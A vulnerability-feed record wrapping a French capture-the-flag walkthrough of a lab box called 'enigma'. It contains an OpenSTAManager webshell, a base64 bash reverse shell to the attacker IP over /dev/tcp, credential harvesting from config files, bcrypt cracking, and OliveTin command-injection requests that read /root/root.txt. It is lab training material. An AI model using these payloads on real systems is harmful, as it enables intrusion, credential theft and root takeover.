{"uuid": "c02226c3-519d-4929-aabf-38604b8715dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "GHSA-25fp-8w8p-mx36", "type": "seen", "source": "https://gist.github.com/zSarix/66a6804b1056cbaf4c2940b8f9808613", "content": "# Info de la box\n\n```md\nMy IP: 10.10.16.3\nIP Target: 10.129.239.191\nOS: Linux (easy)\n```\n\n# \u00c9num\u00e9ration\n\n**Scan de Port** :\n\n```bash\nnmap -sS -Pn -p- 10.129.239.191\n\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n110/tcp open pop3\n111/tcp open rpcbind\n143/tcp open imap\n993/tcp open imaps\n995/tcp open pop3s\n2049/tcp open nfs\n32861/tcp open unknown\n35359/tcp open unknown\n39757/tcp open unknown\n44459/tcp open unknown\n49055/tcp open unknown\n```\n\n```bash\nnmap -sSVC -Pn -p22,80,110,111,143,993,995,2049,32861,35539,39757,44459,49055 10.129.239.191\n\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 0c4bd276ab10069205dcf755947f18df (ECDSA)\n|_ 256 2d6d4a4cee2e11b6c890e683e9df38b0 (ED25519)\n80/tcp open http nginx 1.24.0 (Ubuntu)\n|_http-server-header: nginx/1.24.0 (Ubuntu)\n|_http-title: Did not follow redirect to http://enigma.htb/\n110/tcp open pop3 Dovecot pop3d\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=enigma\n| Subject Alternative Name: DNS:enigma\n| Not valid before: 2026-02-18T20:33:33\n|_Not valid after: 2036-02-16T20:33:33\n|_pop3-capabilities: STLS RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING CAPA TOP\n111/tcp open rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n| program version port/proto service\n| 100000 2,3,4 111/tcp rpcbind\n| 100000 2,3,4 111/udp rpcbind\n| 100000 3,4 111/tcp6 rpcbind\n| 100000 3,4 111/udp6 rpcbind\n| 100003 3,4 2049/tcp nfs\n| 100003 3,4 2049/tcp6 nfs\n| 100005 1,2,3 39757/tcp mountd\n| 100005 1,2,3 45225/udp mountd\n| 100005 1,2,3 45661/tcp6 mountd\n| 100005 1,2,3 58619/udp6 mountd\n| 100021 1,3,4 35359/tcp nlockmgr\n| 100021 1,3,4 36029/udp6 nlockmgr\n| 100021 1,3,4 44341/tcp6 nlockmgr\n| 100021 1,3,4 55972/udp nlockmgr\n| 100024 1 37465/udp6 status\n| 100024 1 44459/tcp status\n| 100024 1 45071/tcp6 status\n| 100024 1 51675/udp status\n| 100227 3 2049/tcp nfs_acl\n|_ 100227 3 2049/tcp6 nfs_acl\n143/tcp open imap Dovecot imapd (Ubuntu)\n| ssl-cert: Subject: commonName=enigma\n| Subject Alternative Name: DNS:enigma\n| Not valid before: 2026-02-18T20:33:33\n|_Not valid after: 2036-02-16T20:33:33\n|_imap-capabilities: IMAP4rev1 LITERAL+ have IDLE OK more capabilities post-login SASL-IR listed Pre-login ENABLE LOGIN-REFERRALS LOGINDISABLEDA0001 ID STARTTLS\n|_ssl-date: TLS randomness does not represent time\n993/tcp open ssl/imap Dovecot imapd (Ubuntu)\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=enigma\n| Subject Alternative Name: DNS:enigma\n| Not valid before: 2026-02-18T20:33:33\n|_Not valid after: 2036-02-16T20:33:33\n|_imap-capabilities: IMAP4rev1 LITERAL+ AUTH=PLAINA0001 IDLE OK more capabilities post-login SASL-IR Pre-login ENABLE LOGIN-REFERRALS have listed ID\n995/tcp open ssl/pop3 Dovecot pop3d\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=enigma\n| Subject Alternative Name: DNS:enigma\n| Not valid before: 2026-02-18T20:33:33\n|_Not valid after: 2036-02-16T20:33:33\n|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP AUTH-RESP-CODE UIDL PIPELINING CAPA USER\n2049/tcp open nfs_acl 3 (RPC #100227)\n32861/tcp open mountd 1-3 (RPC #100005)\n35539/tcp closed unknown\n39757/tcp open mountd 1-3 (RPC #100005)\n44459/tcp open status 1 (RPC #100024)\n49055/tcp open mountd 1-3 (RPC #100005)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n```\n\n**Enumeration NFS** :\n\n```bash\nsudo nmap --script nfs\\* -Pn -T5 -p111-2049 10.129.239.191\n\nPORT STATE SERVICE\n111/tcp open rpcbind\n| nfs-ls: Volume /srv/nfs/onboarding\n| access: Read Lookup NoModify NoExtend NoDelete NoExecute\n| PERMISSION UID GID SIZE TIME FILENAME\n| rwxr-xr-x 0 0 4096 2026-02-19T19:54:47 .\n| ?????????? ? ? ? ? ..\n| rw-r--r-- 0 0 1751 2026-02-19T19:53:57 New_Employee_Access.pdf\n|_\n| nfs-showmount: \n|_ /srv/nfs/onboarding *\n| nfs-statfs: \n| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink\n|_ /srv/nfs/onboarding 8861044.0 6508504.0 2244432.0 75% 16.0T 32000\n143/tcp open imap\n993/tcp open imaps\n995/tcp open pop3s\n2049/tcp open nfs\n```\n\n```bash\nshowmount -e 10.129.239.191 \nExport list for 10.129.239.191:\n/srv/nfs/onboarding *\n\nmkdir target-NFS\nsudo mount -t nfs 10.129.239.191:/srv/nfs/onboarding ./target-NFS -o nolock\n```\n\nSur le document `New_Employee_Access.pdf` on apprends :\n\n```md\nEmployee : Kevin Mitchell\nDepartment : Operations\nProvisioned By : IT Department\nDate : 2024-03-01\n\nwebmail Access\n- URL : http://mail001.enigma.htb\n- Username : Kevin\n- Password : Enigma2024!\n \nFor support contact : it@enigma.htb\n```\n\n# IMAP/POP3\n\n```bash\nopenssl s_client -connect 10.129.239.191:pop3s\nUSER Kevin\n+OK\n\nPASS Enigma2024!\n+OK Loggin In.\n\nLIST\n+OK 1 messages:\n1 1473\n.\n\nRETR 1\nRENEGOTIATING\n40B7F7E19C7F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2323:\n```\n\nBon il refuse, m\u00eame en se connectant avec une vieille version de tls et le flag `-no_renegotiation`\n# Page Web\n\n**Vhosts** :\n\n```bash\nffuf -w /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://enigma.htb/ -H 'Host: FUZZ.enigma.htb' -c -v -ic -ac\n\n /'___\\ /'___\\ /'___\\ \n /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \n \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \n \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \n \\/_/ \\/_/ \\/___/ \\/_/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http://enigma.htb/\n :: Wordlist : FUZZ: /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt\n :: Header : Host: FUZZ.enigma.htb\n :: Follow redirects : false\n :: Calibration : true\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n[Status: 200, Size: 5327, Words: 366, Lines: 97, Duration: 263ms]\n| URL | http://enigma.htb/\n * FUZZ: mail001\n```\n\n**DNS** :\n\n```sh\nffuf -w /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://FUZZ.enigma.htb/ -c -v -ic -ac \n\nR.A.S\n```\n\n**Directory** : \n\n- `enigma.htb`\n\n```bash\nffuf -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://enigma.htb/FUZZ -c -v -ic -ac -e php\n\nR.A.S\n```\n\n- `mail001.enigma.htb`\n\n```bash\nffuf -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://mail001.enigma.htb/FUZZ -c -v -ic -ac -e php\n\nR.A.S\n```\n\nAvec les creds obtenu dans le PDF on arrive \u00e0 se connecter sur `mail001.enigma.htb`\n\nOn trouve un email de `sarah@enigma.htb` :\n\n```md\nHi Kevin, \n \nWelcome to the team! We're thrilled to have you on board at Enigma Corp. \n \nA little about us \u00e2\u20ac\u201d Enigma Corp is a mid-sized technology and operations firm specializing in infrastructure management and enterprise solutions. We've been growing rapidly over the past few years and we're excited to have fresh talent joining us. \n \nI'm Sarah from the Accounts department. I'll be your point of contact for any finance-related queries during your onboarding period. \n \nWe're still finalizing a few of your onboarding details \u00e2\u20ac\u201d your system access, equipment setup, and department introductions are all being arranged by the IT team. You should be receiving your access credentials shortly via the company shared drive. \n \nIn the meantime, don't hesitate to reach out if you have any questions. We want to make sure your first few days are as smooth as possible. \n \nLooking forward to working with you! \n \nBest regards, \nSarah \nAccounts Department \nEnigma Corp \n[sarah@enigma.htb](mailto:sarah@enigma.htb)\n```\n\nEt alors je me dis que je vais tenter le m\u00eame mot de passe avec l'user `Sarah`.\n\nEt bingo je me connecte sur la boite mail de Sarah.\n\nOn y retrouve ce mail :\n\n```md\nHi Sarah, \n \nApologies for the delay. I have provisioned your access. Please find the details below: \n \nURL:\u00a0http://support_001.enigma.htb/\nUsername: admin \nPassword: Ne3s4rtars78s \n \nNote: I will create a dedicated account for you shortly, for now you can use the admin account to get started. \n \nRegards, \nIT Support \nEnigma Corp\n```\n\nBon j'ajoute le nouveau dns/vhost \u00e0 mon fichier `/etc/hosts`\n\n```bash\nsudo nano /etc/hosts\n\n10.129.239.191 enigma.htb mail001.enigma.htb support_001.enigma.htb\n```\n\nJe trouve une CVE sur la version de `OpenSTAManager` qui me permet avec le compte admin, de poster un webshell.\n\nVoici le POC : \n\nhttps://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36\n\n```bash\ncurl http://support_001.enigma.htb/files/SHELL.php\\?c\\=id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\nJ'upgrade mon webshell en vrai reverse shell, je passe par du base64 pour \u00e9viter les gal\u00e8res de syntaxe : \n\nDonc je prends le payload :\n\n```bash\n/bin/bash -i >& /dev/tcp/10.10.16.3/9001 0>&1\n```\n\nPuis en base64\n\n`L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMvOTAwMSAwPiYx`\n\nEt j'envoie cette commande \n\n```bash\ncurl \"http://support_001.enigma.htb/files/SHELL.php?c=echo+'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMvOTAwMSAwPiYx'|base64+-d|bash\"\n```\n\nCe qui donne proprement\n\n```bash\nshell.php?c=echo 'payload' | base64 -d | bash\n```\n\nEt je re\u00e7ois la connection dans mon pwncat-cs\n\n```bash\npwncat-cs -lp 9001\n[06:13:37] Welcome to pwncat \ud83d\udc08! \n[06:25:46] received connection from 10.129.239.191:49904 \n[06:25:48] 10.129.239.191:49904: registered new host w/ db \n(local) pwncat$ \n(remote) www-data@enigma:/var/www/html/openstamanager/files$\n```\n\n# Privesc\n\n```bash\n(remote) www-data@enigma:/var/www/html/openstamanager/files$ cd /home\n(remote) www-data@enigma:/home$ ls\nharis it kevin sarah\n(remote) www-data@enigma:/home$ \n```\n\nOn trouve donc 4 Users.\n\nJ'ai cherch\u00e9 des fichiers de config\n\n```bash\nwww-data@enigma:/var/www/html/roundcube/config$ cat config.inc.php | grep -E 'db_dsn|password|us\n\n// Format (compatible with PEAR MDB2): db_provider://user:password@host/database\n$config['db_dsnw'] = 'mysql://roundcube:Yo270x26!gTx02@localhost/roundcubemail';\n```\n\n```bash\nroundcubemail@enigma:/var/www/html/roundcube/config$ mysql -u roundcube -p'Yo270x26!gTx02' -h localhost\n\nWelcome to the MySQL monitor. Commands end with ; or \\g.\nYour MySQL connection id is 163799\nServer version: 8.0.46-0ubuntu0.24.04.3 (Ubuntu)\n\nmysql> SELECT * FROM users;\n\nSNIP\n\nmysql> \n```\n\nRien d'int\u00e9ressant pas de hash de mdp etc\n\n```bash\nwww-data@enigma:/var/www/html/openstamanager$ cat config.inc.php \n$db_host = 'localhost';\n$db_username = 'brollin';\n$db_password = 'Fri3nds@9099';\n$db_name = 'openstamanager';\n```\n\nJ'essaye de me connecter \u00e0 cette db : \n\n```bash\nmysql -u brollin -p'Fri3nds@9099' -h localhost openstamanager\n\nmysql> SHOW TABLES;\n\nSNIP\nzz_users\n\nmysql> SELECT * FROM zz_users \\G\n*************************** 1. row ***************************\n id: 1\n username: admin\n password: $2y$10$rTJVUNyGGKPlhw2cFdf5AeDHVMhnIChddcHx2XxVLMQS2KsuSz4Pu\n email: admin@enigma.htb\n idanagrafica: 1\n idgruppo: 1\n enabled: 1\n created_at: 2026-02-18 19:26:52\n updated_at: 2026-02-18 19:26:52\n reset_token: NULL\nimage_file_id: NULL\n options: \n*************************** 2. row ***************************\n id: 2\n username: haris\n password: $2y$10$WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC\n email: haris@enigma.htb\n idanagrafica: 1\n idgruppo: 5\n enabled: 1\n created_at: 2026-02-18 20:58:28\n updated_at: 2026-05-26 11:07:03\n reset_token: NULL\nimage_file_id: NULL\n options: \n2 rows in set (0.00 sec)\n```\n\nBingo l\u00e0 on a le hash de haris et admin\n\nOn va essayer de les casser avec hashcat, mais faut d'abord identifier le type de hash, m\u00eame si je guess que c'est du bcrypt\n\n```bash\nhashid -m '$2y$10$WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC'\n \nAnalyzing '$2y$10$WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC'\n[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]\n[+] Woltlab Burning Board 4.x \n[+] bcrypt [Hashcat Mode: 3200]\n```\n\nBingo, on va tenter de le casser.\n\n```bash\nhashcat -a 0 -m 3200 '$2y$10$WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC' /opt/rockyou.txt \n\n$2y$10$WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC:bestfriends\n```\n\nLet's goo, le mdp de harris est `bestfriends`\n\n```bash\nharis@enigma:/var/www/html/openstamanager$ cd\nharis@enigma:~$ ls\nmail user.txt\nharis@enigma:~$ cat user.txt \n2c3dc533ff3a163bab0024252db56a9d\nharis@enigma:~$ \n```\n\nPremier flag.\n\nEnsuite, j'ai \u00e9num\u00e9r\u00e9 les services et ports\n\n```bash\nharis@enigma:/opt/OliveTin/OliveTin-linux-amd64$ ss -tln State Recv-Q Send-Q Local Address:Port Peer Address:Port Process \nLISTEN 0 4096 127.0.0.54:53 0.0.0.0:* \nLISTEN 0 151 127.0.0.1:3306 0.0.0.0:* \nLISTEN 0 100 0.0.0.0:143 0.0.0.0:* \nLISTEN 0 4096 127.0.0.1:1337 0.0.0.0:* \nLISTEN 0 4096 0.0.0.0:22 0.0.0.0:* \nLISTEN 0 64 0.0.0.0:2049 0.0.0.0:* \nLISTEN 0 511 0.0.0.0:80 0.0.0.0:* \nLISTEN 0 100 0.0.0.0:110 0.0.0.0:* \nLISTEN 0 4096 0.0.0.0:111 0.0.0.0:* \nLISTEN 0 100 0.0.0.0:993 0.0.0.0:* \nLISTEN 0 100 0.0.0.0:995 0.0.0.0:* \nLISTEN 0 4096 0.0.0.0:56025 0.0.0.0:* \nLISTEN 0 100 127.0.0.1:25 0.0.0.0:* \nLISTEN 0 4096 0.0.0.0:46551 0.0.0.0:* \nLISTEN 0 4096 0.0.0.0:40257 0.0.0.0:* \nLISTEN 0 70 127.0.0.1:33060 0.0.0.0:* \nLISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* \nLISTEN 0 64 0.0.0.0:38077 0.0.0.0:* \nLISTEN 0 4096 0.0.0.0:55033 0.0.0.0:* \nLISTEN 0 100 [::1]:25 [::]:* \nLISTEN 0 100 [::]:143 [::]:* \nLISTEN 0 4096 [::]:22 [::]:* \nLISTEN 0 64 [::]:2049 [::]:* \nLISTEN 0 511 [::]:80 [::]:* \nLISTEN 0 4096 [::]:41039 [::]:* \nLISTEN 0 100 [::]:110 [::]:* \nLISTEN 0 4096 [::]:111 [::]:* \nLISTEN 0 64 [::]:46015 [::]:* \nLISTEN 0 100 [::]:993 [::]:* \nLISTEN 0 100 [::]:995 [::]:* \nLISTEN 0 4096 [::]:47809 [::]:* \nLISTEN 0 4096 [::]:56455 [::]:* \nLISTEN 0 4096 [::]:48913 [::]:* \nharis@enigma:/opt/OliveTin/OliveTin-linux-amd64$\n```\n\nJe remarque qu'il y a, le port 1337 \u00e9trange, j'ai d\u00e9cide de le curl dans le doute\n\n```bash\ncurl localhost:1337\n```\n\nOn tombe bien sur une page web de OliveTin 3000.10.0\n\nJe l'ai port forward, pour pouvoir l'avoir sur mon burp.\n\n```bash\nmkdir -p ~/.ssh\ncd .ssh/\ntouch authorized_keys\n```\n\nCopier/Coller la cl\u00e9 publique dans authorized_keys\n\n```bash\nharis@enigma:~/.ssh$ nano authorized_keys \nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMAceiq8C0gxOUO36pXEWFC6y2uuEjqyqzIhj4a2Dkk4 sarix@arch\n```\n\nOn setup les droits du fichier :\n\n```bash\nchmod 700 ~/.ssh\nchmod 600 ~/.ssh/authorized_keys\n```\n\n**machine attaquant** :\n\n```bash\nssh haris@enigma.htb\n```\n\nEnsuite j'ai cherch\u00e9 si il existait pas une CVE sur cette version de OliveTin, et effectivement on trouve la CVE-2026-27626 \n\nhttps://github.com/OliveTin/OliveTin/security/advisories/GHSA-49gm-hh7w-wfvf\n\nEn naviguant sur la page, on trouve la page \"Backup Database\" avec un champ password, qui comme dans les d\u00e9tails de la CVE permet avec le type password d'injecter des caract\u00e8res sp\u00e9ciaux.\n\nAlors j'intercepte la requ\u00eate et j'y mets une **Command Injection** :\n\n```http\nPOST /api/olivetin.api.v1.OliveTinApiService/StartAction HTTP/1.1\nHost: localhost:1337\nContent-Length: 242\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36\nsec-ch-ua-platform: \"Linux\"\nAccept-Language: fr-FR,fr;q=0.9\nsec-ch-ua: \"Not-A.Brand\";v=\"24\", \"Chromium\";v=\"146\"\ncontent-type: application/json\nsec-ch-ua-mobile: ?0\nconnect-protocol-version: 1\nAccept: */*\nOrigin: http://localhost:1337\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost:1337/actionBinding/backup_database/argumentForm\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n{\"bindingId\":\"backup_database\",\"arguments\":[{\"name\":\"db_user\",\"value\":\"backup_svc\"},{\"name\":\"db_pass\",\"value\":\"'; id; echo '\"},{\"name\":\"db_name\",\"value\":\"production\"}],\"uniqueTrackingId\":\"f74e37f7-6a31-4d92-86fa-08c7190acec7\"}\n```\n\ndans la r\u00e9ponse on a le TrackingID li\u00e9 \u00e0 notre requ\u00eate\n\n```http\nHTTP/1.1 200 OK\nAccept-Encoding: gzip\nContent-Type: application/json\nDate: Mon, 29 Jun 2026 13:02:48 GMT\nContent-Length: 62\n\n{\"executionTrackingId\":\"c83ae92d-07c9-4658-9307-cbee693f93d1\"}\n```\n\nAlors je fetch dessus pour voir le r\u00e9sultat\n\n```http\nhttp://localhost:1337/logs/c83ae92d-07c9-4658-9307-cbee693f93d1\n```\n\n\u00c7a marche, la commande c'est bien exec, on voit l'id (root).\n\nIl me reste plus qu'\u00e0 afficher le flag\n\n```http\nPOST /api/olivetin.api.v1.OliveTinApiService/StartAction HTTP/1.1\nHost: localhost:1337\nContent-Length: 242\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36\nsec-ch-ua-platform: \"Linux\"\nAccept-Language: fr-FR,fr;q=0.9\nsec-ch-ua: \"Not-A.Brand\";v=\"24\", \"Chromium\";v=\"146\"\ncontent-type: application/json\nsec-ch-ua-mobile: ?0\nconnect-protocol-version: 1\nAccept: */*\nOrigin: http://localhost:1337\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost:1337/actionBinding/backup_database/argumentForm\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n{\"bindingId\":\"backup_database\",\"arguments\":[{\"name\":\"db_user\",\"value\":\"backup_svc\"},{\"name\":\"db_pass\",\"value\":\"'; cat /root/root.txt; echo '\"},{\"name\":\"db_name\",\"value\":\"production\"}],\"uniqueTrackingId\":\"f74e37f7-6a31-4d92-86fa-08c7190acec7\"}\n```\n\nOn me retourne un nouveau TrackingID : \n\n```http\nHTTP/1.1 200 OK\nAccept-Encoding: gzip\nContent-Type: application/json\nDate: Mon, 29 Jun 2026 13:03:58 GMT\nContent-Length: 62\n\n{\"executionTrackingId\":\"339ca5f5-f5bd-467a-bd5d-df523193e139\"}\n```\n\nIl me reste plus qu'\u00e0 fetch sur l'url log en lui fournissant ce TrackingID : \n\n```http\nhttp://localhost:1337/logs/339ca5f5-f5bd-467a-bd5d-df523193e139\n```\n\nOn obtient alors le flag **root** : \n\n**Flag : f1c093db939ace9cc4cfa2715dedfabc**\n", "creation_timestamp": "2026-06-29T13:27:42.173815Z"}